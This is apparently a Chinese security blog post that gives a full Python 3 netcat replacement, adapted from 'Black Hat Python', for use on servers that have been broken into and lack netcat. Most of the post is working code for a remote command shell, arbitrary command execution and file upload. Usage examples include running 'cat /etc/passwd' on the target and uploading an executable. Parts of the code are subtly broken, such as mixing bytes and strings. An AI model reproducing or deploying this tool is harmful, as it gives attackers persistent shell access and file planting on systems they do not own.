当进入的服务器没有安装netcat却安装了Python。在这种情况下,需要创建一个简单的客户端和服务器来传递想使用的文件,或者创建一个监听端让自己拥有控制命令行的操作权限。
#!/usr/bin/env python3
# -*- code:utf-8 -*-
import sys
import socket
import getopt
import threading
import subprocess
# 定义全局变量
listen = False
command = False # 是否建立shell
upload = False
execute = "" # 目标机中执行得命令
target = ""
port = 0
upload_destination = "" # 上传文件路径
def run_command(command):
#换行
command = command.rstrip()
#运行命令并将输出返回
try:
output = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True)
except:
output = b"Failed to execute command.\r\n"
#将输出发送
return output
def client_handler(client_socket):
global upload
global execute
global command
#检查上传文件
if len(upload_destination):
#读取所有的字符并写下目标
file_buffer = ""
#持续读取数据知道没有符合的数据
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
#现在将我们接收这些数据并将他们写下来
try:
file_descriptor = open(upload_destination,"wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
#确认文件已经写出来
client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
except:
client_socket.send("Failed to save file to %s\r\n" % upload_destination)
#检查命令执行
if len(execute):
#运行命令
output = run_command(execute)
client_socket.send(output)
#如果需要一个命令行shell,那么进入另一个循环
if command:
while True:
#跳出一个窗口
client_socket.send(b"<BHP:$> ")
#接收文件直到发现换行符(enter key)
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024).decode("utf-8")
#返回命令输出
response = run_command(cmd_buffer)
#返回响应数据
client_socket.send(response)
def server_loop():
global target
global port
#如果没有定义目标,那我们监听所有端口
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target,port))
server.listen(5)
while True:
client_socket, addr = server.accept()
#拆分一个线程处理新的客户端
client_thread = threading.Thread(target=client_handler,args=(client_socket,))
client_thread.start()
#客户端发送消息,并接收服务端的消息
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
#连接到目标主机
client.connect((target,port))
if len(buffer):
client.send(buffer.encode("utf-8"))
while True:
#等待数据回传
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
response += data.decode("utf-8")
if recv_len < 4096:
break
print (response,end=" ")
#等待其他输入
#python3 中没有raw_input整合为input()
buffer = input("")
buffer += "\n"
#发送出去
client.send(buffer.encode("utf-8"))
except:
print("[*] Exception! Exiting.")
client.close()
#使用手册
def usage():
print("Netcat")
print("Usage: nc.py -t target_host -p port")
print("-l --listen - listen on [host]:[port] for incoming connections")
print("-e --execute=file_to_run -execute the given file upon receiving a connection")
print("-c --command -initialize a command shell")
print("-u --upload=destination -upon receiving connection upload a file and write to [destination]")
print("Examples: ")
print("nc.py -t 192.168.0.1 -p 4444 -l -c")
print("nc.py -t 192.168.0.1 -p 4444 -l -u=c:\\target.exe")
print("nc.py -t 192.168.0.1 -p 4444 -l -e=\"cat /etc/passwd\"")
print("echo 'ABCDEFG' | ./nc.py -t 192.168.0.1 -p 4444")
sys.exit(0)
# 主函数,处理命令行参数,调用其他函数
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
# 读取命令行选项
try:
opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:",
["help", "listen", "execute", "target", "port", "command", "upload"])
except getopt.GetoptError as err:
print(str(err))
usage()
for o, a in opts:
if o in ("-h", "--help"):
usage()
elif o in ("-l", "--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False, "Unhandled Option"
# 我们是进行监听还是仅从标准输入发送数据
if not listen and len(target) and port > 0:
# 从命令行读取内存数据
# 这里将堵塞,所以不在向标准输入发送CTRL-D
buffer = sys.stdin.read()
#发送数据
client_sender(buffer)
#我们开始监听准备上传文件,执行命令
#放置一个反弹shell
#取决于上面的命令行选项
if listen:
server_loop()
if __name__ == '__main__':
main()
服务端
客户端连接
利用客户端发送HTTP请求
人生漫漫其修远兮,网安无止境。
一同前行,加油!